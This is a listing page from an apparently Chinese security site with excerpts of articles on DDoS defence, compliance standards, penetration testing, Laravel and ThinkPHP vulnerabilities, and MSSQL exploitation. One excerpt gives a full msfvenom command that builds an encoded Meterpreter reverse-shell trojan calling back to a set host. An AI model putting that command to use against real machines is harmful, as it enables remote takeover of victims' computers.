首页 网络安全

网络安全

  • 什么是Anti-DDoS流量清洗?
    什么是Anti-DDoS流量清洗?Anti-DDoS流量清洗(CT-AntiDDoS ,Anti-DDoS )通过专业的DDoS防护设备来为用户互联网应用提供精细化的抵御DDOS攻击能力,如UDP Flood攻击、SYN Flood攻击和CC攻击等。用户可业务模型配置流量参数阀值,可监控攻防状态,并查看每日或每周报告。什么是流量清洗?流量清洗是用 ...
    拒绝服务 2019-6-15 11:12 1360
  • 监狱物联网:物联网如何帮助监控囚犯
    一个充满物联网的世界可能是一个非常令人毛骨悚然的地方。想象一下这样一个现实:传感器和设备可以用来全天候监控人们,跟踪人们的活动、生物特征数据,甚至人们的谈话和饮食习惯。如果有人去了不该 ...
    安全学院 2019-6-14 09:04 704
  • 网络安全等级保护系列国家标准解读
    背景情况《信息系统安全等级保护基本要求》(GB/T 22239-2008)、《信息系统安全等级保护测评要求》(GB/T 22239-2008)、《信息系统安全等级保护设计技术要求》(GB/T 25070-2010)在我国推行信息安全等级保护制度 ...
    安全学院 2019-6-13 09:35 1294
  • 网络抗攻击说明免疫力强
    对于一家企业来说,其网络安全的防护好坏与否一定与其遭受到的攻击程度成正比,即防护可不可靠一定看遭受到的攻击狠不狠。这就像练武之前一定要学会挨揍一样,只有那些经历过各类攻击洗礼的企业网络,才最能扛打击。攻防双方并不对称当前我国整个网络安全产业的规模大概在450亿人民币左右。然而让人无 ...
    安全学院 2019-6-12 10:59 667
  • 浅谈渗透测试实战
    0x00 前言很多时候,在看白帽子们的漏洞的时候总有一种感觉就是把web渗透简单地理解成了发现web系统漏洞进而获取webshell。其实,个人感觉一个完整的渗透(从黑客的角度去思考问题)应该是以尽一切可能获取目标的系统或者服务器的最高权限,尽可能的发现足够多的敏感信息。这个过程应该包括但不限于以 ...
    渗透测试 2019-6-12 10:58 1317
  • 渗透测试心得
    子域名收集子域名收集是最简单的收集手法之一,有很多在线的工具可以直接套用,这里分享几个我经常用的。开心的时候用用这个扫描器为什么这么说,因为这是我写的(你生气用的话我怕我屏幕里突然冒出一个拖孩):impo ...
    渗透测试 2019-6-11 09:05 1679
  • 对电信wifi漏洞挖掘
    0x00前言:本人菜鸟,也是无意间的发现该漏洞,过程相当简单,各位dalao勿喷我= =。前两天跟宿友吵了起了,一个人怂了全宿舍其他人,然后只能默默的申请搬去其他栋宿舍楼住,跑来了学校外边跟其他学长们一起住,搬过 ...
    漏洞挖掘 2019-6-9 08:48 2351
  • 一文看懂SQL Server加密功能--数据加密和密钥管理
    概述今天主要介绍SQL Server加密功能,比较特殊,跟其他数据库的设计还是有些不太一样的。下面一起来看看吧~SQL Server 加密功能数据加密是数据库被破解、物理介质被盗、备份被窃取的最后一道防线,数据加密,一方面解决数据被窃取安全问题,另一方面有关法律要求强制加密数据。SQL Server 的数据加密 ...
    安全运维 2019-6-9 08:31 1759
  • Laravel 5.8 SQL 注入漏洞详解
    0x01 背景最近研究Laravel框架的代码审计,因为3月份爆出过一个ignore函数的一个漏洞,网上找了些文章,看了下, 自己搭建环境测试,一直没有成功, 自己就详细的审计了一遍0x02 laravel介绍Laravel 在全球范围内有着众多用户。该框架在国外很受欢迎,国外用户量远大于国内。当然,国内也有大型企业使用该框 ...
    网站防护 2019-6-8 08:51 1922
  • 墨菲定律视角下的数据库入侵防御
    作者:汉领信息 两块随着网络信息化的发展,企业组织对网络安全的关注,由物理安全、边界安全和系统安全,已逐渐将注意力转移到业务安全和数据安全,对于业务数据的安全防护成本已占到企业组织IT预算成本的一半以上 ...
    安全运维 2019-6-8 08:51 1750
  • 详述MSSQL服务在渗透测试中的利用
    前言:致力于复现最实用的漏洞利用过程。本文将带领大家学习以下内容:学习使用`xp_cmdshell`扩展存储过程学习调用`wscript.shell`学习MSSQL写文件学习沙盘模式提权学习注册表映像劫持提权part1 使用`xp_cmdshell`扩展存储过程步骤1 连接MSSQL服务首先打开S ...
    渗透测试 2019-6-7 09:34 1035
  • 「白帽挖洞技能提升」ThinkPHP5 远程代码执行漏洞-动态分析
    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造 ...
    漏洞挖掘 2019-6-6 07:20 1761
  • Kali Linux学习篇:使用Metaspoit生成控制端
    如何使使用Metaspoit生成木马控制端?- 木马:控制端(我们)- 被控制端(倒霉蛋们)- 虚拟机的kali- 打开终端- 使用msfvenom -p命令来制作-msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe asd.e ...
    安全学院 2019-6-4 11:55 845
  • 无密码身份验证在未来几年可能将变得更为普遍。我们不妨来看看目前的发展状况。过去几个月里,微软和谷歌一直在积极推动无密码身份验证。因为在iPhone上首推指纹身份验证,苹果已成无密码身份验证主要玩家。大多数PC和Mac笔记本电脑如今都提供 Touch ID,所以一到两年之内这些东西也可以用于无密码身份 ...
    安全学院 2019-6-4 11:52 904
  • 记一次排查腾讯云遭受攻击CPU100%的情况
    今天一大早网站突然挂了 然后服务器就登不上了现在就是想办法登录到云服务器上采用 腾讯云 VNS浏览器登录https://cloud.tencent.com/developer/article/1367094开始排查 首先top查看发现123这个进程高了 下面可以输入命令ll /proc/5664就可以看到路径先删除进程文件 在 kill -9 5664 解决战斗文章若有 ...
    安全学院 2019-6-3 10:07 1973
返回顶部